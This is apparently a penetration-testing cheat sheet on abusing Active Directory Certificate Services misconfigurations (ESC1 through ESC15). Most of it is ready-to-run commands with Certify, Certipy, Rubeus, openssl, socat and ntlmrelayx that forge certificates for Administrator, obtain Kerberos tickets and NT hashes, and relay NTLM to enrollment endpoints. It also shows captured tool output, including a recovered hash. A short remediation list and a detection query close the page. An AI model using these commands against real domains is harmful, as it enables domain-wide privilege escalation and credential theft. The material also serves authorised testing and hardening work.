AD CS
PKI ?
nxc ldap <ip> -u user -p pass -M adcs
Or run PingCastle or Certify
ESC
Enrolee can request cert for ANY user
ESC2
Any purpose or no EKU (potentially dangerous)
Request an enrollement agent certificate and use it to request cert on behalf of ANY user
ESC4
Overly permissive ACLs on templates
ESC5
Poor access control on CA server, CA server computer object, etc.
EDITF_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user
ESC7
Poor access control on roles on CA authority like "CA Administrator" and "Certificate Manager"
NTLM relay to HTTP enrollement endpoints
NXC
Vulnerable Template
nxc smb IP -u user -d domain.local -p password -M enum_ca
Masky
If you have admin privilege, the module will impersonate all users connected -> ask a certificate (ADCS) -> retrieve the NT hash using PKINIT
Source: https://x.com/mpgn_x64/status/1584863925744521216
Tools
Locksmith
# Run all scans
Invoke-Locksmith -Scan AllCertify
Enumeration
AD CS in the target forest
Certify.exe casTemplates
Certify.exe findVulnerable templates
Certify.exe find /vulnerableCerti
$ certi.py list 'contoso.local/Han' -k -n --dc-ip 192.168.100.2 --vuln --enable | grep ESC3 -B 3
Name: User
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
--
Name: Administrator
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent CertificateCertipy
Vulnerable template
# certipy find -u ca_operator -p NewPassword0xss0rz -dc-ip 10.10.11.41 -vulnerable -enabled
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'domain-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'domain-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'domain-DC01-CA'
[*] Saved BloodHound data to '20241126073356_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241126073356_Certipy.txt'
[*] Saved JSON output to '20241126073356_Certipy.json'
# cat 20241126073356_Certipy.txt | grep ESC
ESC9 : 'DOMAIN.HTB\\operator ca' can enroll and template has no security extension
# cat 20241126073356_Certipy.txtPSPKIAudit
Only ESC1 to ESC8
Metasploit
ADCSKiller
Practice and explanation
ESC1
This attack consists of adding an arbitrary subject to a certificate.
"VulnTemplate" has ENROLLEE_SUPPLIES_SUBJECT value for msPKI-Certificates-Name-Flag
Certify.exe find /enrolleeSuppliesSubject"VulnTemplate" allows enrollment to RDPUsers group.
Request a certificate for DA (or EA) as a user1 (member of RDP group)
Certify.exe request /ca:dc.parent.local\DC-CA /template:"VulnTemplate" /altname:administratorConvert cert.pem to pfx and use it to request a TGT for DA (or EA)
Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:passw0rd /pttLinux - Certipy
# certipy req -u 'BANKING$@retro.vl' -p 'P@ssw0rd' -dc-ip '10.10.118.214' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'Administrator@retro.vl'If Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template, Go back to the certipy find result and get the RSA Key Length. Append it to the command: -key-size
# certipy req -u 'BANKING$@retro.vl' -p 'P@ssw0rd' -dc-ip '10.10.118.214' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'Administrator@retro.vl' -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'Administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'# certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389Kerberos error : « Object SID mismatch between certificate and user »
To fix this, you can specify an alternative subject SID using the -SID option.
$ certipy req -u "user@domain.local" -p password -dc-ip [IP] -target "Target_IP] -ca 'ADCS-name' -template 'ESC1' -upn administator@domain.local -sid [Certificate_object_SID]
$ certipy auth -pfx administrator.pfx -dc-ip [IP] -debugESC2
Find vulnerable templates
certipy find -u 'bspears' -p REDACTED -dc-ip 10.10.0.10 -vulnerable -enabled Exploit
certipy-ad req -u 'bspears' -p 'REDACTED' \
-dc-ip '10.10.0.10' \
-target 'dc01.foobar.com' \
-ca 'foobar-CA' \
-template 'ESC2_User'-debug certipy-ad req -u 'bspears' -p 'REDACTED' -dc-ip '10.10.0.10' \
-target 'dc01.foobar.com'
-ca 'foobar-CA' \
-template 'User' \
-on-behalf-of 'example\administrator' \
-pfx bspears.pfx -debug ESC3
Request an enrollement agent certificate and use it to request cert on behalf of ANY user
"VulnTemplateEnrollement-Agent" allows Domain users to enroll and has 'Certificate Request Agent' EKU
"VulnTemplateEnrollement-Users" has an Application Policy Issuance Requirement of Certificate Request Agent and has an EKU that allows for domain authentication
Escalation to DA
child.parent.local: child domain
parent.local: parent domain
Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template
Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-AgentConvert cert.pem to pfx and use it to request a cert on behalf on DA using "VulnTemplateEnrollement-Users"
openssl.exe pkcs12 -in C:\path\to\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3agent.pfx Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:child\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rdConvert from cert.pem to pfx, request DA TGT and inject it
openssl.exe pkcs12 -in C:\path\to\DA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3user-DA.pfx Rubeus.exe asktgt /user:administrator /certificate:esc3user-DA.pfx /password:passw0rd /pttEscalation to EA
Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template - see Escalation to DA
Convert cert.pem to pfx and use it to request a cert on behalf on EA using "VulnTemplateEnrollement-Users
Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:parent.local\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rdRequest EA TGT and inject it
Rubeus.exe asktgt /user:parent.local\administrator /certificate:esc3user-EA.pfx /dc:dc.parent.local /password:passw0rd /pttESC4
certipy template -u billy@foobar.com -p REDACTED -template ESC4Certificate_FOOBAR -dc-ip <DC_IP> -save-oldcertipy req -u 'billy@foobar.com' -p 'REDACTED' -dc-ip '10.10.1.100' -target 'foobar-CA.foobar.com ' -ca 'foobar-CA' -template 'ESC4Certificate_FOOBAR' -upn 'DA_Dan@foobar.com' certipy auth -pfx DA_Dan.pfxClean up
certipy template
-u user@foobar.com \
-p REDACTED \
-template ESC4Certificate_FOOBAR \
-dc-ip <DC_IP> \
--configuration 'ESC4Certificate_FOOBAR.json'ESC6
EDITF_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user from a template that allow enrollment to low-priv user
"Vuln-Integration" grants enrollment to RDPUsers group.
Request a certificate for DA (or EA) as a user1 (member of RDP group)
Certify.exe request /ca:dc.parent.local\DC-CA /template:"Vuln-Integration" /altname:administratorConvert cert.pem to pfx and use it to request a TGT for DA (or EA)
Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:passw0rd /pttESC8 - PetitPotam
NTLM relay to HTTP enrollement endpoints
Windows ExploitESC9
Certifried - CVE-2022-26923
ADCSCoercePotato
On the attacker system:
socat TCP-LISTEN:135,reuseaddr,fork TCP:<TARGET-IP>:9999On a domain-joined system:
ADCSCoercePotato.exe -m <REMOTE-DCOM-SERVER/ADCS-SERVER> -k <IP-ADDRESS-SOCAT-REDIRECTOR> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -c D99E6E74-FC88-11D0-B498-00A0C90312F3Relay with ntlmrelayx.py to the ADCS Web enrollment Endpoint:
impacket-ntlmrelayx -t http://<ADCS-WEB-ENROLLMENT-IP/FQDN>/certsrv/certrqus.asp --adcs --template <TEMPALTE-NAME/machine> -smb2supportRemoteKrbRelay
RemoteKrbRelay.exe -adcs -template domaincontroller -target <FQDN-DC.DOMAIN.COM> -victim <FQDN-VICTIM.DOMAIN.COM> -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3CertPotato
KrbRelay-SMBServer
Network AttacksESC14
ADCS ESC15 (EKUwu) - CVE-2024-49019
The TrustedSec team tested the CVE-2024-49019 vulnerability across multiple clients, finding that 10 out of 15 environments were at risk
Detection: Bloodhound query
MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p
Credit: @SpecterOps
Exploitation
From Child to Forest
Relay Attack on WinReg RPC Client
Remediation
The following security controls should be implemented to mitigate an ESC1 AD CS compromise:
Remove the Enrolee Supplies Subject flag. Do not allow users to provide their own SAN in the certificate signing request for templates configured for client authentication. Templates configured with the Enrolee Supplies Subject flag allow a user to provide their own SAN.
Restrict standard user object permissions on certificate templates. Standard user objects should not have write permissions on certificate templates. User objects with write permissions may be able to change enrolment permissions or configure additional settings to make the certificate template vulnerable.
Remove vulnerable AD CS CA configurations. Ensure that the CA is not configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. When configured, this allows a SAN to be provided on any certificate template.
Require CA Certificate Manager approval for certificate templates that allow the SAN to be supplied. This ensures certificate templates that require CA certificate manager approval are not issued automatically when requested; instead, they must be approved using certificate manager before the certificate is issued.
Remove EKUs that enable user authentication. This prevents malicious actors from exploiting the certificate to authenticate as other users.
Limit access to AD CS CA servers to only privileged users that require access. This may be a smaller subset of privileged users than the Domain Admins security group and reduces the number of opportunities for malicious actors to gain access to CA servers.
Restrict privileged access pathways to AD CS CA servers to jump servers and secure admin workstations using only the ports and services that are required for administration. AD CS servers are classified as ‘Tier 0’ assets within Microsoft’s ‘Enterprise Access Model’.
Only use AD CS CA servers for AD CS and do not install any non-security-related services or applications. This reduces the attack surface of AD CS CA servers as there are fewer services, ports and applications that may be vulnerable and used to compromise an AD CS CA server.
Encrypt and securely store backups of AD CS CA servers and limit access to only Backup Administrators. Backups of AD CS CA servers need to be afforded the same security as the actual AD CS CA servers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as AD CS CA servers.
Centrally log and analyse AD CS CA server logs in a timely manner to identify malicious activity. If malicious actors gain privileged access to a CA server, this activity should be identified as soon as possible to respond and limit the impact.
Detection
ADCS Honeypot
DetectionResources
Last updated